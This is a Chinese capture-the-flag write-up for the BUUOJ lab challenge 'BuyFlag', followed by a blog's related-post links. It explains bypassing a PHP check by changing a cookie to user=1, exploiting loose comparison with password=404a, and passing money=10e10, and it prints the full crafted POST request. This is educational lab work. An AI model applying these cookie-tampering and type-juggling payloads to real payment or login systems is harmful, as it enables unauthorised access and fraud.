网站题直接去看源码，在源码也搜索php有两个：index.php、pay.php。前者是首页，直接看后面的那个，打开就有提示

Only Cuit’s students can buy the FLAG

应该还是一道http的套娃题。查看网页的请求发现Cookie中有一个user=0，很可疑，改成user=1，有了下一个提示：输入密码，并且源码中有一段php

<!--~~~post money and password~~~
if (isset($_POST['password'])) {$password = $_POST['password'];if (is_numeric($password)) {echo "password can't be number</br>";}elseif ($password == 404) {echo "Password Right!</br>";}
}

还记得php==关系运算会强制转换类型，用POST传一个password=404a，404a会被强制转换为404，密码就对上了。接下来是钱的问题，flag需要100000000块钱我们也去要传过去。如果直接传入这么长的会提示字符串过长，所以我想到了科学计数法，10e10，就是10的10次方，通过。最终的请求：

POST /pay.php HTTP/1.1
Host: 268f365e-648d-477c-ba25-0c56572cc31f.node3.buuoj.cn
Content-Length: 25
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://268f365e-648d-477c-ba25-0c56572cc31f.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.104 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://268f365e-648d-477c-ba25-0c56572cc31f.node3.buuoj.cn/pay.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user=1
Connection: closepassword=404a&money=10e10

---

[极客大挑战 2019]BuyFlag相关推荐

1. BUUOJ 极客大挑战 2019套餐

   仅为做题思路,记下笔记,如有错误烦请斧正 [极客大挑战 2019]EasySQL 进题目发现是个登陆页面 admin admin登陆一下 注意URL,试试万能密码?username=admin& ...

2. [BUUCTF-pwn]——[极客大挑战 2019]Not Bad(ORW)(内涵peak小知识)

   [BUUCTF-pwn]--[极客大挑战 2019]Not Bad 又是一道收获满满的题目. peak小知识 seccomp: seccomp是一种内核中的安全机制,正常情况下,程序可以使用所有的sy ...

3. BUUCTF Web [极客大挑战 2019]Havefun

   「作者主页」:士别三日wyx   此文章已录入专栏<网络攻防>,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之 ...

4. BUUCTF-web [极客大挑战 2019]PHP1 之 反序列化漏洞

   PHP反序列化漏洞 一,什么是序列与反序列 序列就是把数据转成可逆的数据结构,目的是方便数据的储存和传输,反序列就是将数据逆转成原来的状态,序列就是拆数据,使得传输或储存更容易的过程,反序列就是重新拼 ...

5. BUUCTF Web 极客大挑战 2019 EasySQL

   BUUCTF Web 极客大挑战 2019 EasySQL 文章目录 BUUCTF Web 极客大挑战 2019 EasySQL 1,输入万能密码: 2,输入万能账号 首先有点常识: 正常SQL语句这 ...

6. [极客大挑战 2019]FinalSQL

   [极客大挑战 2019]FinalSQL 依次点击5个页面 到最后一个页面发现提示尝试第6个页面,观察到url中的id,输入6得到 有参数,尝试单引号 提示error 那么应该存在sql注入,尝试永真 ...

7. BUUCTF Web [GXYCTF2019]Ping Ping Ping [极客大挑战 2019]LoveSQL [极客大挑战 2019]Knife [极客大挑战 2019]Http

   目录 [GXYCTF2019]Ping Ping Ping [极客大挑战 2019]LoveSQL [极客大挑战 2019]Knife [极客大挑战 2019]Http [GXYCTF2019]Pin ...

8. BUUCTF——web（[GXYCTF2019]Ping Ping Ping、[极客大挑战 2019]Knife、[极客大挑战 2019]Http）

   BUUCTF-web [GXYCTF2019]Ping Ping Ping 做题思路 [极客大挑战 2019]Knife 做题思路 [极客大挑战 2019]Http 做题思路 [GXYCTF2019] ...

9. 极客大挑战2019php,[极客大挑战 2019]PHP

   标签:spl   payload   sorry   min   private   lob   audio   ascii   sel 题目上说有备份的好习惯,扫描目录得到www.zip 几个重要p ...

最新文章

1. wp 删除独立存储空间文件（多级非空文件夹删除）
2. 晴天计算机按键,电脑怎样才能在按键的时候，按下去按键没反应，手台起来才有呢？...
3. 以太坊智能合约预言机
4. C#使用Tesseract OCR 解析验证码
5. mysql语法中的LIMIT的用法
6. python的运行环境_python-运行环境配置-1
7. Windows Live SkyDrive, Windows Live Sync 和 Live Mesh
8. 【torch】pytorch label的one-hot转化
9. 用Neo4j图形数据库打造专属于你的高bigger关系图
10. 微信html人脸识别接口,微信人脸识别可视化的实现：
11. 【Latex】模板设置及使用教程
12. 启动系统时无法正常启动提示\windows\system32\winload.efi 解决方案
13. 中文字体下载大全+传世书法墨迹珍藏..等20款
14. 【高数】高数第七章节——微分方程概念一阶微分方程高阶微分方程
15. 2021SC@SDUSC山东大学软件学院软件工程应用与实践--YOLOV5代码分析（十）plots.py-2
16. HTML中的 meta 标签
17. word.interop
18. 云智慧智能研究院：2022年智能运维发展八大趋势
19. 全面！数据分析思路大梳理
20. 润达软件:双十一临近,百度商城悄然上线

热门文章

1. xshell终端中文乱码解决
2. Win7查看开机记录
3. 【今日CV 视觉论文速览】 19 Nov 2018
4. JupyterNotebook配置远程登录
5. DDL 创建与查询数据库
6. 草稿 0242 ktv第一个页面
7. dj鲜生-32-用户中心-收货地址
8. javascript-引入-函数的定义与使用-多值传参-ao对象
9. mysql kill 超过1分钟的语句
10. Android手势的识别